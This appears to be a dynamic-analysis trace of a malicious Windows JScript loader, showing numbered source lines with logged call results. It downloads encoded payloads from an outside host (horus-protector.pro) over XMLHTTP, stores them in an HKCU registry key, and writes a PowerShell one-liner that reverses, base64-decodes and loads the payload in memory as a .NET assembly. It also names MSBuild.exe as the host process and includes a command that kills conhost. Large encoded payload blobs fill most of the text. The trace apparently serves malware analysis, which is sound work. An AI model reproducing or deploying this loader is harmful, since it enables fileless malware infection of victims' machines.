                                                                                                                                                                  • writeToRegistry("YLhjFraZZwiadZg","s","=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") ➔ undefined
                                                                                                                                                                  • writeToRegistry("YLhjFraZZwiadZg","i","MSBuild.exe") ➔ undefined
                                                                                                                                                                  • writeToRegistry("YLhjFraZZwiadZg","Path","YLhjFraZZwiadZg") ➔ undefined
                                                                                                                                                                  • writeToRegistry("YLhjFraZZwiadZg","v","{[}AppDomain{]}::CurrentDomain.Load{(}[Convert{]}::FromBase64String{(}{(}-join {(}Get-ItemProperty -LiteralPath 'HKCU:\Software\YLhjFraZZwiadZg' -Name 's'{)}.s | ForEach-Object {{}$_{[}-1..-{(}$_.Length{)}{]}{}}{)}{)}{)}; {[}a.a{]}::a{(}'YLhjFraZZwiadZg'{)}") ➔ undefined
                                                                                                                                                                  • writeToRegistry("YLhjFraZZwiadZg","cn","Stop-Process -Name conhost -Force") ➔ undefined
                                                                                                                                                                  111
                                                                                                                                                                  var registry = GetObject ( "winmgmts:\\\\.\\root\\default:StdRegProv" );
                                                                                                                                                                  • GetObject("winmgmts:\\.\root\default:StdRegProv") ➔
                                                                                                                                                                  • GetObject("winmgmts:\\.\root\default:StdRegProv") ➔
                                                                                                                                                                  • GetObject("winmgmts:\\.\root\default:StdRegProv") ➔
                                                                                                                                                                  • GetObject("winmgmts:\\.\root\default:StdRegProv") ➔
                                                                                                                                                                  • GetObject("winmgmts:\\.\root\default:StdRegProv") ➔
                                                                                                                                                                  • GetObject("winmgmts:\\.\root\default:StdRegProv") ➔
                                                                                                                                                                  112
                                                                                                                                                                  registry.CreateKey ( CONST_GCU, "Software\\" + keyPath );
                                                                                                                                                                  • CreateKey(2147483649,"Software\YLhjFraZZwiadZg") ➔ 0
                                                                                                                                                                  • CreateKey(2147483649,"Software\YLhjFraZZwiadZg") ➔ 0
                                                                                                                                                                  • CreateKey(2147483649,"Software\YLhjFraZZwiadZg") ➔ 0
                                                                                                                                                                  • CreateKey(2147483649,"Software\YLhjFraZZwiadZg") ➔ 0
                                                                                                                                                                  • CreateKey(2147483649,"Software\YLhjFraZZwiadZg") ➔ 0
                                                                                                                                                                  • CreateKey(2147483649,"Software\YLhjFraZZwiadZg") ➔ 0
                                                                                                                                                                  113
                                                                                                                                                                  registry.SetStringValue ( CONST_GCU, "Software\\" + keyPath, valueName, value );
                                                                                                                                                                  • SetStringValue(2147483649,"Software\YLhjFraZZwiadZg","r","00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000234D000000C000000600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300E2000300E2000300E20013000000E600F6009600370027005600650002009700C6002600D600560037003700140010008000830000000300E2000300E2000300E20013000000E600F600960037002700560065004700360057004600F600270005001000800043000000130007000700140037007700F6004600E60096007500000000005600D6001600E4004700360057004600F600270005001000C00083000000C600C6004600E200130007000700140037007700F6004600E6009600750000005600D6001600E6005600C60096006400C6001600E6009600760096002700F40010000100840000000000000000003700B60027001600D60056004600160027004500C600160076005600C40010001000A20000004300230003002300020002009A0002004700860076009600270097000700F600340000004700860076009600270097000700F6003400C600160076005600C4001000210084000000C600C6004600E200130007000700140037007700F6004600E6009600750000005600D6001600E400C6001600E600270056004700E600940010000100040000000300E2000300E2000300E200130000000000E600F600960037002700560065005600C600960064001000800003000000130007000700140037007700F6004600E6009600750000000000E600F6009600470007009600270036003700560044005600C600960064001000C000040000000000000000005600D6001600E4009700E60016000700D600F600340010001000220000000000000037004700E6005600D600D600F600340010001000A1000000030026004300030003000300030003001000002086000000F6006600E60094005600C600960064007600E600960027004700350010000020C8400B00000000000000E600F600960047001600C6003700E60016002700450000004000420000000000F6006600E60094005600C600960064002700160065001000000044000000000000000000000000000000200000004000000000000000F30000000000100000000000000010000000100000EFFE40DB0000000000F4006400E4009400F500E400F40094003500250054006500F5003500650000004330C20000000000000000000030C20000088500000084000000000010000000000000000000000000000008000003000000100010000000000000000000000000000008000081000000010010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100020052FF0000000000C6C646E2565627F63637D600E69616D4C6C64427F634F5000000000000000000000000264B0000000000000000000000000000000000000000000002000000262C00000000000000000000268A00264607E2130707143777F646E69675C57657265644C5A626F6C5130707143777F646E69675C54323032363038323C53747E656D65736F644C5E696D64616C53727563755C5A33400000010634D72C087DAE5B8245EDFAA65F09256354435250000000000000000000000000000000100000000000000000000000000004402") ➔ 0
                                                                                                                                                                  • SetStringValue(2147483649,"Software\YLhjFraZZwiadZg","s","=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") ➔ 0
                                                                                                                                                                  • SetStringValue(2147483649,"Software\YLhjFraZZwiadZg","i","MSBuild.exe") ➔ 0
                                                                                                                                                                  • SetStringValue(2147483649,"Software\YLhjFraZZwiadZg","Path","YLhjFraZZwiadZg") ➔ 0
                                                                                                                                                                  • SetStringValue(2147483649,"Software\YLhjFraZZwiadZg","v","{[}AppDomain{]}::CurrentDomain.Load{(}[Convert{]}::FromBase64String{(}{(}-join {(}Get-ItemProperty -LiteralPath 'HKCU:\Software\YLhjFraZZwiadZg' -Name 's'{)}.s | ForEach-Object {{}$_{[}-1..-{(}$_.Length{)}{]}{}}{)}{)}{)}; {[}a.a{]}::a{(}'YLhjFraZZwiadZg'{)}") ➔ 0
                                                                                                                                                                  • SetStringValue(2147483649,"Software\YLhjFraZZwiadZg","cn","Stop-Process -Name conhost -Force") ➔ 0
                                                                                                                                                                  114
                                                                                                                                                                  }
                                                                                                                                                                    115
                                                                                                                                                                    function fetchStringFromURL(url) {
                                                                                                                                                                    • fetchStringFromURL("s4.txt") ➔ "3D414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414D3841414141774141414145414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141345465734A57626C4E3363683943504B306750765A6D624A523363314A486476774449676F51442B6B4864704A58646A56326376774449674143494B3067507A56325A6C785761326C6D635152575A304E585A3146585A7939435067414349674143494B3067507649535A7A7857596D4A53507A4E585A6A4E5751705648496949585A72396D64756C3063684A535073566D646C78474973566D646C786B62766C4764314E575A3456455A6C5233636C5658636C4A48506741434967414349674169434E346A497A596E4C744E5859363032626A3143646D393263764A33597031574C7A4657626C6832597A706A6279566E49394D6E6273314765674D585A6E564762705A58617942465A6C5233636C5658636C4A485067414349674143494B30675035525861795633596C4E485067414349676F51442B49694D323553627A466D4F7439325974516E5A764E3362794E5761743179636831575A6F4E326336346D63314A53507A35476274684849765A6D624A523363314A4864384143494B3067507649436377466D4C753957613046325970784763774655654E4A53506C315759754269497734434D75416A4C78495350753957617A4A585A32425365306C47647556475A4A6C48626931575A7A4E5859384143494B30675069416A4C78495350753957617A4A585A575233636C5A5761754657626749534D323553627A466D4F7439325974516E5A764E3362794E5761743179636831575A6F4E326336346D63314A53507A3547627468484935786D59745632637A4647504B3067434E347A50694D585A354A53506C3532627346475A754647647A4269493430695255566C4939636D62705232626A35575A6749434D75456A4939343262704E6E636C5A4849733147652F777A76372B4F41414141414141414141414141426F4F41414D4775414141417741674C414144417541414D41344341784141414134474176425161414D48417942515A41594641674151654177474169425162415547417A4277634145454142414143416744414141414D413443417741674C414144417541514D4141414175427762416B47417A4267634155474157424164414D47413142415A4138474179424155414541414941414E414141416E42675A415147416E42675A415147416E42675A415147414141414141554741744251594134454130427759415548416B4277624149484151425141416F414130414141414141416C424165415547417541414E414944417741674D415944417741414F414944414141515A413047416842676241554741734251614159454173425159413447417042775A416B474179427754414541414E4167514141414141414141414141417A4277614149484168425162415547416B4251594149484155424162414547416E42515A4177454142415141416F43414141414E414944417741674D414143416741517141414341304241614163474170426763416B484177427762414D454141414164416747416E42516141494841354241634138474144424162414547416E42515A41774541424167454167454141414141415547413442515A413443413041674D414144417941674E414144413441674D414141416C425162414547414F42416241454741754267634155474130426762416B454142415144416F44414141414D413443417741674C414144417541514D41414141"
                                                                                                                                                                    • fetchStringFromURL("r4.txt") ➔ "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000234D000000C000000600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300E2000300E2000300E20013000000E600F6009600370027005600650002009700C6002600D600560037003700140010008000830000000300E2000300E2000300E20013000000E600F600960037002700560065004700360057004600F600270005001000800043000000130007000700140037007700F6004600E60096007500000000005600D6001600E4004700360057004600F600270005001000C00083000000C600C6004600E200130007000700140037007700F6004600E6009600750000005600D6001600E6005600C60096006400C6001600E6009600760096002700F40010000100840000000000000000003700B60027001600D60056004600160027004500C600160076005600C40010001000A20000004300230003002300020002009A0002004700860076009600270097000700F600340000004700860076009600270097000700F6003400C600160076005600C4001000210084000000C600C6004600E200130007000700140037007700F6004600E6009600750000005600D6001600E400C6001600E600270056004700E600940010000100040000000300E2000300E2000300E200130000000000E600F600960037002700560065005600C600960064001000800003000000130007000700140037007700F6004600E6009600750000000000E600F6009600470007009600270036003700560044005600C600960064001000C000040000000000000000005600D6001600E4009700E60016000700D600F600340010001000220000000000000037004700E6005600D600D600F600340010001000A1000000030026004300030003000300030003001000002086000000F6006600E60094005600C600960064007600E600960027004700350010000020C8400B00000000000000E600F600960047001600C6003700E60016002700450000004000420000000000F6006600E60094005600C600960064002700160065001000000044000000000000000000000000000000200000004000000000000000F30000000000100000000000000010000000100000EFFE40DB0000000000F4006400E4009400F500E400F40094003500250054006500F5003500650000004330C20000000000000000000030C20000088500000084000000000010000000000000000000000000000008000003000000100010000000000000000000000000000008000081000000010010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100020052FF0000000000C6C646E2565627F63637D600E69616D4C6C64427F634F5000000000000000000000000264B0000000000000000000000000000000000000000000002000000262C00000000000000000000268A00264607E2130707143777F646E69675C57657265644C5A626F6C5130707143777F646E69675C54323032363038323C53747E656D65736F644C5E696D64616C53727563755C5A33400000010634D72C087DAE5B8245EDFAA65F09256354435250000000000000000000000000000000100000000000000000000000000004402"
                                                                                                                                                                    116
                                                                                                                                                                    var httpRequest = new ActiveXObject ( "MSXML2.XMLHTTP" );
                                                                                                                                                                      117
                                                                                                                                                                      httpRequest.open ( "GET", "http://horus-protector.pro/c/" + url, false );
                                                                                                                                                                      • open("GET","http://horus-protector.pro/c/s4.txt",false) ➔ undefined
                                                                                                                                                                      • open("GET","http://horus-protector.pro/c/r4.txt",false) ➔ undefined
                                                                                                                                                                      118
                                                                                                                                                                      httpRequest.send ( );
                                                                                                                                                                      • send() ➔ undefined
                                                                                                                                                                      • send() ➔ undefined
                                                                                                                                                                      119
                                                                                                                                                                      if ( httpRequest.status === 200 )
                                                                                                                                                                        120
                                                                                                                                                                        {
                                                                                                                                                                          121
                                                                                                                                                                          return httpRequest.responseText;
                                                                                                                                                                            122
                                                                                                                                                                            }
                                                                                                                                                                              123
                                                                                                                                                                              else
                                                                                                                                                                                124
                                                                                                                                                                                {
                                                                                                                                                                                  125
                                                                                                                                                                                  return "";
                                                                                                                                                                                    126
                                                                                                                                                                                    }
                                                                                                                                                                                      127
                                                                                                                                                                                      }
                                                                                                                                                                                        128
